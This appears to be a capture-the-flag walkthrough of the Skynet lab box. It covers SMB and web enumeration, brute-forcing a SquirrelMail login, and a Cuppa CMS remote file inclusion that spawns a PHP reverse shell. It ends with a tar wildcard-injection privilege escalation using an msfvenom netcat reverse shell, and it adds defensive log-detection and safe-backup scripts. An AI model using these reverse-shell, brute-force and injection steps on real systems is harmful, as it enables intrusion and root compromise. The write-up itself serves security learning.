

General Enumeration and Initial Findings (Nmap, FFuF, SMBClient)

Starting off, as always, with a basic nmap scan

nmap -sC -sV -oN initial -T4

Nmap scan report for
Host is up (0.21s latency).
Not shown: 994 closed ports
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imap
|_imap-capabilities: SASL-IR more post-login have IDLE listed capabilities LITERAL+ ENABLE OK ID Pre-login LOGINDISABLEDA0001 IMAP4rev1 LOGIN-REFERRALS
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-06-06T08:26:40-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-06T13:26:40
|_  start_date: N/A

A few interesting ports.

80 - Webserver

139 and 445 - SMB.

Let’s kick around the webserver.


Search engine that does… nothing? Nothing in the source, no robots.txt. Let’s see if we can bust some directories with FFuF, using the SecLists Common list, matching all response codes and filtering out 404s.

ffuf -u -w /common.txt -mc all -fc 404

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
admin                   [Status: 301, Size: 310, Words: 20, Lines: 10]
config                  [Status: 301, Size: 311, Words: 20, Lines: 10]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 523, Words: 26, Lines: 19]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
squirrelmail            [Status: 301, Size: 317, Words: 20, Lines: 10]

/admin and /config are Forbidden but how about /squirrelmail?


Login page. Let’s do some more enumeration before trying to crack this.

Since 139 and 445 are open, we’ll take a look at some SMB enumeration using smbclient

smbclient -L \\\\\\


Two interesting shares. anonymous and milesdyson

smbclient \\\\\\anonymous


Grab attention.txt with get attention.txt

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

logs is a directory with three files; only one of them has any data.


Grab log1.txt with get log1.txt


Passwords, maybe? Let’s go back to /squirrelmail and see if any of these work. We saw that there was a milesdyson share, so maybe that’s a username. Let’s use FFuF again, but this time to brute-force the login form.

Capture the login request in burp to build the command.


ffuf -u -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-type: application/x-www-form-urlencoded" -w log1.txt
cyborg007haloterminator [Status: 302, Size: 0, Words: 1, Lines: 1]

Got a 302 redirect, which means this is likely our password. Log in!




SMB password?! Maybe we can access the milesdyson share now!


cd notes
ls


Grab important.txt with get important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

New endpoint! /45kra24zxs28v3yd

Access (Cuppa CMS, Remote File Inclusion, FFuF)


Running FFuF against the new endpoint using the SecLists Common list, matching all response codes and filtering out 404s.

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
administrator           [Status: 301, Size: 335, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 418, Words: 45, Lines: 16]


Cuppa CMS


Looks like there’s an LFI/RFI exploit for Cuppa CMS.

Using the PoC to make sure it’s vulnerable. Decoded:

	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";

So we have LFI, let’s try RFI

Using php-reverse-shell.php from pentestmonkey.

  1. Edit the relevant values (IP and PORT)
  2. Host it on a webserver - python3 -m http.server
  3. Start a listener - nc -lvnp 4444
  4. Include your URL - alerts/alertConfigField.php?urlConfig=http://IP:PORT/php-reverse-shell.php
  5. Send it!
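From the defender’s side, the include request above leaves a distinctive trace in the web server’s access log. The following is an added example, not part of the original write-up and not code from Cuppa CMS: a small POSIX shell check that flags access-log lines whose query string carries a URL scheme (remote include) or a ../ traversal (local include). The log lines are constructed for the example, with made-up hosts, times and response sizes; the function names are mine.

```shell
#!/bin/sh
# Added example (not part of the original write-up or of Cuppa CMS): spot
# file-inclusion attempts in an Apache access log. A remote include shows up
# as a URL scheme inside a query-string value; a local include as a ../
# traversal in the same place.

# Constructed sample log (Apache common log format); hosts, times and sizes
# are made up. Lines 2 and 3 mimic the urlConfig requests the write-up uses.
SAMPLE_LOG='10.0.0.5 - - [06/Jun/2021:08:30:01 -0500] "GET /45kra24zxs28v3yd/index.html HTTP/1.1" 200 418
10.0.0.5 - - [06/Jun/2021:08:31:12 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 1453
10.0.0.5 - - [06/Jun/2021:08:32:40 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.0.0.5:8000/php-reverse-shell.php HTTP/1.1" 200 0
10.0.0.9 - - [06/Jun/2021:08:33:05 -0500] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2240'

# Print the log lines (read from stdin) whose query string carries a URL
# scheme or a parent-directory traversal. Exit status follows grep:
# 0 if at least one line matched, 1 if none did.
flag_inclusion_attempts() {
    grep -E '\?[^ "]*=(https?|ftp|php|data)://|\?[^ "]*\.\./'
}

# Number of flagged lines, printed as a bare integer.
count_inclusion_attempts() {
    flag_inclusion_attempts | wc -l | tr -d ' '
}

# Reduce each flagged line to its query string, for triage or alert text.
inclusion_params() {
    flag_inclusion_attempts | sed -E 's/.*\?([^ "]*) HTTP.*/\1/'
}

# Demo on the constructed log: prints the two suspicious query strings.
printf '%s\n' "$SAMPLE_LOG" | inclusion_params
```

Serving the include from a remote host also depends on PHP’s allow_url_include directive being enabled, which is Off by default; keeping it off, and having the application resolve includes from a fixed allowlist rather than from a request parameter, removes the RFI path even while the parameter itself is still reachable.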


Privesc (tar checkpoints, Wildcard Injection, msfvenom)

Password reuse! Using cyborg007haloterminator we can switch to the milesdyson user.

There’s an interesting script in /home/milesdyson/backups called

milesdyson@skynet:~/backups$ cat

cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Let’s check if it’s running as a cronjob

cat /etc/crontab

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

So every minute root runs the script, which changes to the /var/www/html directory and runs tar cf on everything in it. milesdyson doesn’t have write access to /var/www/html, but if we drop back down to www-data we do!

Since tar is invoked on a shell wildcard, it’s vulnerable to injection: filenames that look like tar’s --checkpoint options get expanded by the shell and passed to tar as options.


Create a reverse shell using msfvenom and start a listener

msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=PORT R 

nc -lvnp PORT
touch -- "--checkpoint-action=exec=sh"
touch -- --checkpoint=1

Notice the -- before the file name: it tells touch to stop parsing options, so names beginning with -- are created as files rather than read as flags.

Now we wait…
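The backup job above is the whole privesc, so it’s worth showing what the fix looks like. The following is an added example, not the room’s script and not from the original write-up: a POSIX shell audit_option_names function that lists entries in a directory whose names start with - (the kind of name the attack needs to exist), and a safe_backup function that archives the directory with tar -C DIR -- . so that no filename ever reaches tar’s option position. The demo directory is constructed in a temp dir; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the write-up or the room). The root cron job runs
# "tar cf backup.tgz *" inside a directory writable by www-data, so any file
# whose name starts with "--" is expanded by the shell into tar's argument
# list and parsed as an option. Two defensive pieces:
#  1. audit_option_names DIR      lists entries whose names begin with "-",
#     suitable for a periodic check on web roots and other shared dirs;
#  2. safe_backup DIR ARCHIVE     archives DIR without a wildcard, so such
#     files are just files.

# List directory entries whose names start with "-", one per line.
# Returns 0 when none are found (the check passes), 1 when at least one is.
# Like the cron job's "*", the glob does not expand dotfiles.
audit_option_names() {
    dir=$1
    found=0
    for entry in "$dir"/*; do
        [ -e "$entry" ] || continue        # empty directory: glob stays literal
        name=${entry##*/}
        case $name in
            -*) printf '%s\n' "$name"; found=1 ;;
        esac
    done
    return $found
}

# Archive DIR into ARCHIVE (a path outside DIR) without the wildcard.
# Two defenses stack: "--" ends option parsing, and "-C DIR ." names the
# directory itself instead of letting the shell expand its contents.
safe_backup() {
    dir=$1
    archive=$2
    tar -cf "$archive" -C "$dir" -- .
}

# Demo on a constructed directory standing in for /var/www/html.
demo_dir=$(mktemp -d)
printf 'hello\n' > "$demo_dir/index.html"
touch "$demo_dir/--checkpoint=1"         # the kind of name the write-up creates
if audit_option_names "$demo_dir"; then
    echo "no option-like names in $demo_dir"
else
    echo "WARNING: option-like names found in $demo_dir (listed above)"
fi
safe_backup "$demo_dir" "$demo_dir.tar"
tar -tf "$demo_dir.tar"                   # "./--checkpoint=1" appears as a plain member
rm -rf "$demo_dir" "$demo_dir.tar"
```

Running the job as root against a directory a web user can write to is the other half of the problem; with the wildcard gone, a file named --checkpoint=1 is just another member of the archive, which is what the tar -tf listing at the end shows.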